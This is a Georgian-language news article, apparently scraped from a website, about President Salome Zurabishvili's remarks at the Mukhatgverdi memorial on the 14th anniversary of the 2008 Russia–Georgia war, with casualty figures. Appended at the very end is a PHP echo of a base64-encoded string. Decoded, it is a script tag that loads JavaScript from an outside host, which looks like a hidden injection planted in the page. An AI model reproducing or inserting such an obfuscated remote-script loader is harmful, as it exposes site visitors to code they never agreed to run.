celsiusi
ავერსი საქკაბელი
იმისთვის, რომ წინ ვიაროთ, აუცილებელია ვიყოთ ერთიანი, ერთობის გარეშე ამ გზას ვერ გავივლთ და ვერ შემოვიერთებთ მოქალაქეებს, რომლებიც ცხოვრობენ აფხაზეთსა, თუ ცხინვალში, - ამის შესახებ საქართველოს პრეზიდენტმა სალომე ზურაბიშვილმა მუხათგვერდის ძმათა სასაფლაოზე განაცხადა, სადაც დაღუპულ გმირთა მემორიალი გვირგვინით შეამკო.
 
როგორც სალომე ზურაბიშვილმა აღნიშნა, აგვისტოს ომი, რომელიც ოკუპირებული ტერიტორიებით დასრულდა, გამარჯვება არ არის, მაგრამ საქართველომ მაინც გაიმარჯვა, რადგან დღეს ჩვენი დამოკიდებულება, დემოკრატია და ევროპისკენ აღებული გეზი უფრო ძლიერია.
 
„მინდა სრულიად საქართველოს გავუზიარო დღევანდელი დღის დიდი მნიშვნელობა. ყველაფერი არ უნდა გადავიტანოთ ტრაგიზმში, ეს არის მნიშვნელოვანი დღეები და ბრძოლები, რომელიც დასრულდა ოკუპირებული ტერიტორიებით, ეს არ არის გამარჯვება, მაგრამ საქართველომ მაინც გაიმარჯვა, დღეს ჩვენი დამოკიდებულება, დემოკრატია და გზა ევროპისკენ არის უფრო ძლიერი. უნდა ვიზრუნოთ ოკუპირებულ ტერიტორიებზე მცხოვრებ ადამიანებზე, ისინი არ უნდა დავივიწყოთ და შევეგუოთ ამ მდგომარეობას. ამისთვის უნდა დავივიწყოთ, ის ბოღმა და სიძულვილი, რომელიც სუფევს ამ ქვეყანაში და ვიაროთ წინ საბოლოო გამარჯვებისკენ. ამ ქვეყანაში არავინ არ არის ახალი ომის, ან მეორე ფრონტის მომხრე, მე ეს თემები არ მესმის, ამ ქვეყანაში ყველა არის მომხრე, რომ საქართველო გაძლიერდეს და იყოს დამოუკიდებელი“, - აღნიშნა სალომე ზურაბიშვილმა.
 
ცნობისთვის, აგვისტოს 5-დღიანი ომიდან 14 წელი გავიდა. 2008 წლის აგვისტოს რუსეთ-საქართველოს ომში საქართველოს თავდაცვის სამინისტროს 170 მოსამსახურე, შინაგან საქმეთა სამინისტროს 14 თანამშრომელი და 224 სამოქალაქო პირი დაიღუპა. დაჭრილ და დაშავებულ სამოქალაქო და სამხედრო პირთა რაოდენობა სულ 2 232-ს შეადგენს, მათ შორის, 1045 პირი სამხედრო მოსამსახურეა.
479
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");